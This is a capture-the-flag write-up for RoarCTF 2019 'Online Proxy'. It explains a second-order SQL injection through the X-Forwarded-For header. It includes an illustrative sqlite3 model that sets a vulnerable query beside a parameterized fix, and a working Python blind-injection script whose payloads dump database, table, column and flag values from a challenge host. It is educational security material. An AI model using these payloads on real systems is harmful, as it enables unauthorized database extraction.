[RoarCTF 2019]Online Proxy



Seeing our IP displayed should bring X-Forwarded-For (XFF) to mind: it is the header the server reads to identify the client IP, and we can set it to anything we like.

Key takeaway

As soon as you see a Current IP and a Last IP, you should suspect that our IP is being written into a database.

So SQL is involved.

Testing the closing characters one by one shows that the value is closed with a single quote.

How the injection executes

When the data is written to the database:

1. `127.0.0.1'or'1` is stored as the Current Ip. Then a new X-Forwarded-For value is sent, say 123 (any value will do).

2. `127.0.0.1'or'1` is now treated as the Last Ip, 123 becomes the new Current Ip, and `127.0.0.1'or'1` is written into the database. This is the moment the injection fires: the value is taken from storage rather than from the request, so it is concatenated into the write query unescaped and evaluated as an SQL expression.

3. Sending 123 again matches the stored Current Ip, so the application reads the row back and displays what the evaluated expression produced: `127.0.0.1'or'1` is true, so 1 is echoed as the Last Ip. Every yes/no question to the database therefore costs three requests, in exactly this order.
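The three steps above are a second-order (stored) SQL injection: the payload is harmless when it arrives and only fires when the application reads it back and concatenates it into a later query. To make that concrete, here is an added example (my own code, not the challenge's source or this writeup's script): an in-memory sqlite3 model of the Current IP / Last IP logic with the vulnerable UPDATE beside a parameterized one, and the three-request blind extraction run against both. The table names, the flag value, the `Last IP: <value>` page layout and the use of sqlite's `unicode()` in place of MySQL's `ascii()` are assumptions.

```python
import sqlite3

# Added example, not code from the challenge or from this writeup: an in-memory
# sqlite3 model of the "Current IP / Last IP" logic described in the three
# steps above.  Table names, the flag value and the "Last IP: <value>" page
# layout are constructed assumptions; the real challenge ran MySQL, so
# unicode() stands in for ascii().

FLAG = "flag{2nd_0rder}"  # constructed secret for the blind query to read out


def make_app(safe):
    """Return (con, visit); visit(uuid, xff) mimics one request with the given
    track_uuid cookie and X-Forwarded-For header and returns the page text."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE ips (uuid TEXT PRIMARY KEY, current_ip TEXT, last_ip TEXT)")
    con.execute("CREATE TABLE secrets (flag TEXT)")
    con.execute("INSERT INTO secrets VALUES (?)", (FLAG,))

    def visit(uuid, xff):
        row = con.execute("SELECT current_ip, last_ip FROM ips WHERE uuid = ?",
                          (uuid,)).fetchone()
        if row is None:
            # Request input is parameterized, so there is no first-order injection.
            con.execute("INSERT INTO ips VALUES (?, ?, '')", (uuid, xff))
            return f"Current IP: {xff}\nLast IP: "
        current, last = row
        if xff != current:
            # Step 2: the stored current_ip becomes last_ip.  `current` was read
            # from the database, so the developer "trusted" it and concatenated
            # it: the payload is evaluated as an SQL expression and its *result*
            # (1 or 0) is what gets stored.
            if safe:
                con.execute("UPDATE ips SET last_ip = ?, current_ip = ? WHERE uuid = ?",
                            (current, xff, uuid))
            else:
                con.execute(f"UPDATE ips SET last_ip = '{current}', current_ip = ? "
                            "WHERE uuid = ?", (xff, uuid))
            # The page still echoes the in-memory values, so nothing leaks yet.
            return f"Current IP: {xff}\nLast IP: {current}"
        # Step 3: same IP as stored, so the row is read back and displayed.
        return f"Current IP: {current}\nLast IP: {last}"

    return con, visit


def extract(visit, uuid, subquery, maxlen=64):
    """Binary-search each character of `subquery`'s result, three requests per
    guess: the Current/Last dance the writeup's scripts automate."""
    result = ""
    for i in range(1, maxlen + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) >> 1
            payload = f"0' or (unicode(substr(({subquery}),{i},1)) > {mid}) or '0"
            visit(uuid, payload)       # 1. payload is stored as current_ip
            visit(uuid, "123")         # 2. payload moves to last_ip and is evaluated
            page = visit(uuid, "123")  # 3. same IP again: stored result is shown
            if "Last IP: 1" in page:
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # substr() past the end gives '', so no character compares > 0
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    _, vulnerable = make_app(safe=False)
    print("vulnerable:", extract(vulnerable, "u1", "select flag from secrets"))
    _, hardened = make_app(safe=True)
    print("hardened:  ", repr(extract(hardened, "u2", "select flag from secrets")))
```

Run as-is: the vulnerable app leaks the constructed flag one comparison at a time, while the hardened app stores the payload literally, so the oracle never answers 1 and extraction stops at the first character. Note where the fix has to go: validating or escaping the X-Forwarded-For header on input does not help, because the injected text is read back from the database later; the query that re-uses stored data is the one that must be parameterized.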

# 爆数据库 / 爆表名 / 字段 / flag: one script, four payloads
import re
import requests

url = "http://node3.buuoj.cn:28520/"
head = {
	# track_uuid is per session: use the one your own browser was issued
	"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
	"X-Forwarded-For" : ""
}

# Each template gets (position, guess) substituted in; the expression after the
# first single quote is evaluated when the stored value is re-used by the server.
# 0x46346c395f4434743442343565 is hex('F4l9_D4t4B45e'); the hex form avoids
# needing quotes inside the injected string.
payloads = {
	# 爆数据库: the payload for this stage is missing from the page, select database() is assumed
	"database" : "0' or ascii(substr((select database()),{0},1))>{1} or '0",
	# 爆表名
	"table_name" : "0' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0",
	# 字段
	"column_name" : "0' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0",
	# flag
	"flag" : "0' or ascii(substr((select F4l9_C01uMn from F4l9_D4t4B45e.F4l9_t4b1e limit 1,1),{0},1))>{1} or '0",
}

def probe(payload):
	"""One true/false question to the database: three requests, in this order."""
	head["X-Forwarded-For"] = payload
	requests.get(url, headers=head)        # 1. payload becomes Current Ip
	head["X-Forwarded-For"] = "123"
	requests.get(url, headers=head)        # 2. payload becomes Last Ip and is written to the DB
	r = requests.get(url, headers=head)    # 3. same IP again: the stored row is read back
	# the condition held if the Last Ip field now shows 1 (check the exact label on your page)
	return re.search(r"Last\s*Ip:\s*1\b", r.text, re.I) is not None

def dump(template, maxlen=100):
	"""Binary-search each character; ascii() of a position past the end is 0."""
	result = ""
	for i in range(1, maxlen + 1):
		l, r = 0, 127
		while l < r:
			mid = (l + r) >> 1
			if probe(template.format(i, mid)):   # is the character > mid ?
				l = mid + 1
			else:
				r = mid
		if l == 0:
			break
		result += chr(l)
		print(result)
	return result

for name, template in payloads.items():
	print(name + ":" + dump(template))

Feel free to share; when reposting please credit the source: 内存溢出

Original URL: https://54852.com/langs/718053.html